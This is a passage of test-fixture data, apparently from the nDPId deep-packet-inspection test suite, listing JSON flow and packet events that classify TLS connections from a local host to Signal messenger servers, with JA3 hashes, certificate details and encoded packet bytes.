{"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN6\/Abvpz5RKqNYh2YAQBAsAMQAAAQEICihVkvtkFUBM"} 
-00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264090,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7AAbuO10ReRcpLjoAQBAvkagAAAQEICihVkvtkFUBN"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264091,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7BAbuYIIuNFdnORoAQBAtBKQAAAQEICihVkvxkFUBN"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264093,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264073,"flow_last_seen":1569051264342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1637,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1569051264342,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01421{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":229,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264073,"flow_last_seen":1569051264343,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2666,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1569051264343,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264090,"flow_last_seen":1569051264369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264369,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":234,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264090,"flow_last_seen":1569051264369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264369,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":238,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264093,"flow_last_seen":1569051264373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":239,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264093,"flow_last_seen":1569051264373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} 
-00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264091,"flow_last_seen":1569051264373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":241,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264091,"flow_last_seen":1569051264374,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264374,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open 
Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264666,"flow_last_seen":1569051264666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264666,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1569051264666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264666,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN7CAbvJrSrvAAAAALAC\/\/+7dwAAAgQFtAEDAwcBAQgKKFWUiQAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1569051264775,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264775,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sL5Zid4ya0q8KASaN+dwQAAAgQFrAQCCApkFUDdKFWUiQEDAwg="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1569051264776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264776,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7CAbvJrSrw+WYneYAQBAsw7wAAAQEICihVlPVkFUDd"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264666,"flow_last_seen":1569051264776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":323,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264666,"flow_last_seen":1569051264887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264887,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":324,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264666,"flow_last_seen":1569051264887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264887,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051266396,"flow_last_seen":1569051266396,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569051266396,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1569051266396,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1569051266396,"pkt":"xGGLNYKpxiwDYGpkCABFAABMyV0AADQGy0wXORgQwKgCEQG73rjhiC89LB07wYAYAQKY+AAAAQEICpZOcwIoVP9fFwMDABNN53WS+HQ+OdIkNGbGHI++PaTs"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1569051266396,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051266396,"pkt":"xGGLNYKpxiwDYGpkCABFAAA0yV4AADQGy2MXORgQwKgCEQG73rjhiC9VLB07wYARAQL5ggAAAQEICpZOcwIoVP9f"} 
-00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1569051266743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1569051266743,"pkt":"xGGLNYKpxiwDYGpkCABFAABMyV8AADQGy0oXORgQwKgCEQG73rjhiC89LB07wYAYAQKXnQAAAQEICpZOdF0oVP9fFwMDABNN53WS+HQ+OdIkNGbGHI++PaTs"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051267121,"flow_last_seen":1569051267121,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051267121,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1569051267121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051267121,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGbbHAqAIRDSP9Kt7DAbsjR8rsAAAAALAC\/\/\/U1AAAAgQFtAEDAwcBAQgKKFWeFwAAAAAEAgAA"} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1569051267154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051267154,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAPEG\/LQNI\/0qwKgCEQG73sO\/wI8zI0fK7aAScSCWtAAAAgQFrAQCCAqvNN\/RKFWeFwEDAwg="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1569051267161,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051267161,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGbb3AqAIRDSP9Kt7DAbsjR8rtv8CPNIAQBAsybAAAAQEICihVnjqvNN\/R"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051267121,"flow_last_seen":1569051267161,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051267161,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":378,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051267121,"flow_last_seen":1569051267197,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051267197,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":379,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051267121,"flow_last_seen":1569051267197,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1569051267197,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","server_names":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, 
